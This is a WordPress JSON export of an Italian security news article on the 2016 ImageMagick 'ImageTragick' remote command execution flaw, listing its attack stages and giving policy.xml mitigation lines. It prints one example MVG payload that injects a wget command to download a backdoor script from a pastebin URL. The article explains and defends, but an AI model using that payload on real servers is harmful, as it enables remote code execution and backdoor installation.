{"id":46290,"date":"2016-05-04T22:39:12","date_gmt":"2016-05-04T21:39:12","guid":{"rendered":"http:\/\/www.alground.com\/site\/?p=46290"},"modified":"2019-07-11T20:23:02","modified_gmt":"2019-07-11T19:23:02","slug":"imagemagick-sito-al-sicuro-dal-bug-imagetragick","status":"publish","type":"post","link":"https:\/\/alground.com\/site\/imagemagick-sito-al-sicuro-dal-bug-imagetragick\/46290\/","title":{"rendered":"ImageMagick. Il tuo sito \u00e8 al sicuro dal bug ImageTragick?"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_82_2 counter-hierarchy ez-toc-counter ez-toc-grey ez-toc-container-direction\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">Punti chiave<\/p>\n<label for=\"ez-toc-cssicon-toggle-item-69f8497aacdd8\" class=\"ez-toc-cssicon-toggle-label\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/label><input type=\"checkbox\"  id=\"ez-toc-cssicon-toggle-item-69f8497aacdd8\"  aria-label=\"Toggle\" \/><nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/alground.com\/site\/imagemagick-sito-al-sicuro-dal-bug-imagetragick\/46290\/#Come_funziona_il_bug_ImageMagick\" >Come funziona il bug ImageMagick<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/alground.com\/site\/imagemagick-sito-al-sicuro-dal-bug-imagetragick\/46290\/#Come_proteggere_il_vostro_sito\" >Come proteggere il\u00a0vostro sito<\/a><\/li><\/ul><\/nav><\/div>\n<p><a href=\"http:\/\/www.imagemagick.org\/script\/index.php\" target=\"_blank\" rel=\"noopener noreferrer\">ImageMagick<\/a> \u00e8 un popolare software utilizzato per convertire, modificare e manipolare le immagini. Ha librerie per tutti i linguaggi di programmazione comuni, tra cui PHP, Python, Ruby e molti altri. \u00c8 anche molto semplice da usare, questo lo ha\u00a0portato ad essere utilizzato da molti sviluppatori quando necessitano di opzioni di ritaglio dell&#8217;immagine o manipolazione di foto.<\/p>\n<p>\u00c8 anche possibile utilizzare ImageMagick per aggiungere annotazioni di testo alle immagini, ad esempio con l&#8217;aggiunta di una barra grigia nella parte inferiore con un avviso di copyright; per eseguire la correzione automatica del colore; per affinare la messa a fuoco di una serie di immagini;\u00a0per la produzione di GIF animate per siti web; e altro ancora.<\/p>\n<p>ImageMagick supporta anche diversi linguaggi di scripting come MSL (Magick Scripting Language) e MVG (Vector Graphics Magick), che consentono di descrivere le immagini, in entrambi i formati pixel-based e vettoriali.<\/p>\n<p>Tuttavia, le ultime versioni di ImageMagick non filtrano correttamente i nomi dei file che vengono passati\u00a0alle funzioni\u00a0che gestiscono i protocolli esterni (come HTTPS). Questo permette a un attacker\u00a0di eseguire i comandi a distanza caricando un&#8217;immagine. Il che\u00a0porta ad una vulnerabilit\u00e0 RCE completa (esecuzione di\u00a0comando remoto) nell&#8217;uploader di immagini. La vulnerabilit\u00e0 \u00e8 cos\u00ec grave che i ricercatori hanno creato un divertente nick name pi\u00f9 facile da ricordare al posto del codice\u00a0<strong>CVE-2.016-3.714 <\/strong>ovvero <strong>ImageTragick<\/strong>.<\/p>\n<p>&nbsp;<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Come_funziona_il_bug_ImageMagick\"><\/span>Come funziona il bug ImageMagick<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>La vulnerabilit\u00e0 \u00e8 molto semplice da sfruttare, un attaccante ha bisogno solo di uno strumento: l&#8217;uploader di un&#8217;immagine per fare\u00a0leva sul codice di ImageMagick. Ci sono\u00a0molte applicazioni web popolari e prodotti SaaS vulnerabili. Purtroppo, anche con tutta l&#8217;attenzione dei media, non tutti sono a conoscenza di questo problema.<\/p>\n<p>Approfondendo\u00a0questa vulnerabilit\u00e0 pu\u00f2 effettivamente essere divisa in 4 diverse fasi, come ha spiegato molto bene\u00a0Karim Valiev dal team Security Mail.Ru <strong><a href=\"http:\/\/www.openwall.com\/lists\/oss-security\/2016\/05\/03\/18\" target=\"_blank\" rel=\"noopener noreferrer\">in questa discussione<\/a><\/strong>.<\/p>\n<ol>\n<li>Esecuzione di un comando a distanza attraverso upload di file\u00a0<strong>MVG \/ .svg<\/strong>\u00a0. Tramite\u00a0un file un aggressore pu\u00f2 forzare un comando di shell da eseguire sul server. Questo \u00e8 un esempio molto semplice di come pu\u00f2 funzionare:\n<pre>immagine su 0,0 1,1 'url (https: \"; wget\" http:\/\/pastebin.com\/raw\/badpastebin \"-O \/home\/vhosts\/file\/backdoor.pl\")'<\/pre>\n<p>Quando viene aggiunto un file\u00a0<strong>MVG<\/strong>, il comando\u00a0<strong>wget<\/strong>\u00a0viene eseguito e l&#8217;output del file salvato su pastebin in\u00a0<strong>backdoor.pl.<\/strong><\/li>\n<li>Cancellazione del file remoto. Quando si utilizza il pseudo\u00a0protocollo \u201cephemeral:\/\u201d un utente malintenzionato pu\u00f2 rimuovere i file sul server<\/li>\n<li>Spostamento di un file remoto: simile alla sua\u00a0eliminazione, ma quando si utilizza il pseudo protocollo\u00a0&#8221; <strong>MSL: \/<\/strong> &#8220;, l&#8217;attaccante pu\u00f2 spostare i file<\/li>\n<li>La divulgazione dei file contenuti nel server quando si utilizza il protocollo &#8221; <strong>label:<\/strong> @ &#8220;.<\/li>\n<\/ol>\n<p>Quando si combinano tutti questi bug, gli attaccanti hanno una vasta gamma di opzioni e strumenti per compromettere una applicazione web che sfrutta ImageMagick. Si noti che solo il filtraggio per l&#8217;estensione\u00a0<strong>MGV<\/strong>\u00a0non \u00e8 sufficiente, in quanto qualsiasi formato di file verr\u00e0 ispezionato e il comando eseguito.<\/p>\n<p>Si fa notare\u00a0inoltre che altri strumenti IDS non rilevano e questo problema.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Come_proteggere_il_vostro_sito\"><\/span>Come proteggere il\u00a0vostro sito<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Gli utenti dietro un WAF (Web Application Firewall) sono gi\u00e0 protetti contro questa vulnerabilit\u00e0, ma si consiglia comunque a tutti di seguire le <strong><a href=\"https:\/\/www.imagemagick.org\/discourse-server\/viewtopic.php?f=4&amp;t=29588\" target=\"_blank\" rel=\"noopener noreferrer\">raccomandazione degli sviluppatori ImageMagick<\/a><\/strong> e di modificare il file \/etc\/ImageMagick\/policy.xml e disabilitare l&#8217;elaborazione delle <strong>MVG, HTTPS, EPHEMERAL,<\/strong> e <strong>MSL<\/strong>.<\/p>\n<p>Nella parte seguente, aggiungere le righe:<\/p>\n<pre>&lt;policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" \/&gt;\r\n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" \/&gt;\r\n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" \/&gt;\r\n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" \/&gt;<\/pre>\n<p>Se non \u00e8 possibile effettuare tali modifiche, disabilitare immediatamente\u00a0la funzionalit\u00e0 di caricamento delle immagini, \u00a0fino a quando \u00e8 possibile patchare correttamente. Meglio prevenire che curare.<\/p>\n<p>Questo articolo \u00e8 stato redatto seguendo le indicazioni fornite da <a href=\"https:\/\/blog.sucuri.net\/2016\/05\/imagemagick-remote-command-execution-vulnerability.html\" target=\"_blank\" rel=\"noopener noreferrer\">Sucuri Security<\/a>, <a href=\"https:\/\/nakedsecurity.sophos.com\/2016\/05\/04\/is-your-website-or-blog-at-risk-from-this-imagemagick-security-hole\/\" target=\"_blank\" rel=\"noopener noreferrer\">Sophos<\/a>, e <a href=\"https:\/\/www.imagemagick.org\/discourse-server\/viewtopic.php?f=4&amp;t=29588#p132726\" target=\"_blank\" rel=\"noopener noreferrer\">ImageMagik<\/a>. Qualsiasi novit\u00e0 verr\u00e0 aggiunta a questo post aggiornandolo. Potete anche chiedere informazioni pi\u00f9 specifiche o altri aiuti, per quello che possiamo aiuteremo a capire meglio questo pericolosa vulnerabilit\u00e0.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>ImageMagick \u00e8 un popolare software utilizzato per convertire, modificare e manipolare le immagini. Ha librerie per tutti i linguaggi di programmazione comuni, tra cui PHP, Python, Ruby e molti altri. \u00c8 anche molto semplice da usare, questo lo ha\u00a0portato ad essere utilizzato da molti sviluppatori quando necessitano di opzioni di ritaglio dell&#8217;immagine o manipolazione di [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":46292,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"pmpro_default_level":"","footnotes":""},"categories":[1413,387],"tags":[],"class_list":{"0":"post-46290","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-attualita","8":"category-guide-sicurezza","9":"pmpro-has-access"},"aioseo_notices":[],"jetpack_featured_media_url":"https:\/\/alground.com\/site\/wp-content\/uploads\/2016\/05\/image.jpeg","wps_subtitle":"","_links":{"self":[{"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/posts\/46290","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/comments?post=46290"}],"version-history":[{"count":0,"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/posts\/46290\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/media\/46292"}],"wp:attachment":[{"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/media?parent=46290"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/categories?post=46290"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/tags?post=46290"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}